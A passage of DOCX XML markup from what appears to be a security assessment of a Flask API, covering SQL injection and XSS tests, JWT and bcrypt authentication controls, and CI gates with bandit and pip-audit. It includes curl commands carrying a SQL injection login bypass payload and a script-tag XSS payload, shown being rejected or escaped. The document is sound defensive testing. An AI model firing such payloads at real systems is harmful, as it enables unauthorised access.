        <w:spacing w:before="80" w:after="160" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="113"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F8"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>$ curl -X POST …/auth/login -d '{"login":"alice'"'"' OR '"'"'1'"'"'='"'"'1","password":"x"}'</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>{"error":"invalid username or password"}          # HTTP 401</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>The same three payloads are asserted in</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
          <w:color w:val="9C272E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>tests/test_auth.py::test_sql_injection_in_login_does_not_bypass_auth</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>4.2 XSS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Sanitisation happens on output, at the trust boundary, via</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
          <w:color w:val="9C272E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>markupsafe.escape()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>; the database keeps the original bytes so no data is</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>destroyed and no double-encoding accumulates.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="113"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F8"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>$ curl -X POST …/api/posts -d '{"title":"&lt;script&gt;alert(1)&lt;/script&gt;","content":"xss test"}'</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>{"author":"alice","content":"xss test","id":3,</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> "title":"&amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt;"}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Responses additionally carry </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
          <w:color w:val="9C272E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>X-Content-Type-Options: nosniff</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
          <w:color w:val="9C272E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>X-Frame-Options: DENY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>, `Content-Security-Policy: default-src 'none';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>frame-ancestors 'none'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
          <w:color w:val="9C272E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Referrer-Policy: no-referrer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
          <w:color w:val="9C272E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Cache-Control: no-store`.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>4.3 Broken authentication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shd w:val="clear" w:color="auto" w:fill="E8EE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  <w:t>Requirement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3099"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8EE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  <w:t>Implementation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3099"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8EE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  <w:t>Test</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3099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Issue a JWT on login</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3099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 xml:space="preserve">HS256, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
                <w:color w:val="9C272E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>exp</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
                <w:color w:val="9C272E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>iat</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
                <w:color w:val="9C272E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>nbf</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>, 15 min TTL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3099"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
                <w:color w:val="9C272E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>test_login_success_returns_bearer_token</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3099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Verify the token on protected endpoints</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3099"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
                <w:color w:val="9C272E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>@token_required</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> middleware</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3099"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
                <w:color w:val="9C272E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>test_data_requires_a_token</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3099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No plaintext passwords</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3099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bcrypt cost 12, per-password salt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3099"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
                <w:color w:val="9C272E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>test_password_hash_never_leaves_the_service</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3099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Signature cannot be forged</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3099"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
                <w:color w:val="9C272E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>algorithms=["HS256"]</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> pinned</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3099"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
                <w:color w:val="9C272E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>test_alg_none_token_is_rejected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alibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
                <w:color w:val="9C272E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>test_token_signed_with_another_key_is_rejected</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3099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No user enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3099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identical message + dummy bcrypt on unknown user</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3099"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
                <w:color w:val="9C272E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>test_login_unknown_user_gives_same_message</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3099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Brute force limited</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3099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 xml:space="preserve">5 failures / 5 min per (user, IP) → </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
                <w:color w:val="9C272E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>429</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3099"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
                <w:color w:val="9C272E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>test_brute_force_is_throttled</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5. CI/CD</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
          <w:color w:val="9C272E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>.github/workflows/ci.yml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>, triggered on every push and pull request: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  <w:shd w:val="clear" w:color="auto" w:fill="E8EE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  <w:t>Job</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2324"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8EE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  <w:t>Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2324"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8EE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  <w:t>Gate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2324"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8EE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  <w:t xml:space="preserve">Result on </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
                <w:b/>
                <w:color w:val="9C272E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>bd09fb1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2324"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
                <w:color w:val="9C272E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>test</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="232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pytest 8.3.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="232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22 tests must pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="232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22 passed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2324"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
                <w:color w:val="9C272E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>sast</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="232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 xml:space="preserve">bandit 1.9.4 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
                <w:color w:val="9C272E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>-ll</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="232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fails on MEDIUM or higher; SARIF to code scanning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="232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no issues at MEDIUM+, one Low below the gate</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2324"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
                <w:color w:val="9C272E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>sca</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="232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 xml:space="preserve">pip-audit 2.7.3 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
                <w:color w:val="9C272E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>--strict</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="232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fails on any known-vulnerable dependency</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="232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no known vulnerabilities</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">The workflow defaults to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
          <w:color w:val="9C272E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>permissions: contents: read</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>; only the SAST job is</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">granted </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
          <w:color w:val="9C272E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>security-events: write</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>, so a compromised third-party action cannot push</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>to the repository.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>The pipeline caught a real defect on its first run.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> The initial build failed —</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">not on the tests, but on SCA. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
          <w:color w:val="9C272E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>pip-audit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> reported 18 advisories across the two</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>pinned dependencies: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  <w:shd w:val="clear" w:color="auto" w:fill="E8EE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  <w:t>Package</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2324"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8EE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  <w:t>Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2324"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8EE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  <w:t>Advisories</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2324"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8EE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  <w:t>Fixed in</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2324"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
                <w:color w:val="9C272E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>flask</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="232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3.1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="232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PYSEC-2026-1377, PYSEC-2026-2151</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="232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3.1.1 / 3.1.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2324"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
                <w:color w:val="9C272E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>pyjwt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="232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2.10.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="232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PYSEC-2025-183, PYSEC-2026-120/175–179/4140–4149/4152/4183</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="232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2.12.0 – 2.15.0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3461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b-run1-fail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346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7"/>
        </w:rPr>
        <w:t>run 1 — the SCA gate fails the build</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">The pins were raised to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
          <w:color w:val="9C272E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Flask==3.1.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
          <w:color w:val="9C272E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>PyJWT==2.15.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
          <w:color w:val="9C272E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>bcrypt==5.0.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>; the suite</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">still passed and the next run went green (run 39460231575, commit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
          <w:color w:val="9C272E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>ef4a7fb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>). A</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>reviewer would not have noticed a stale pin by reading the diff — the gate did.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3315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c-run-gre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331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7"/>
        </w:rPr>
        <w:t>a green run — three jobs, all ticks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>The pipeline then caught a defect in itself.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> The green runs still carried a red</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
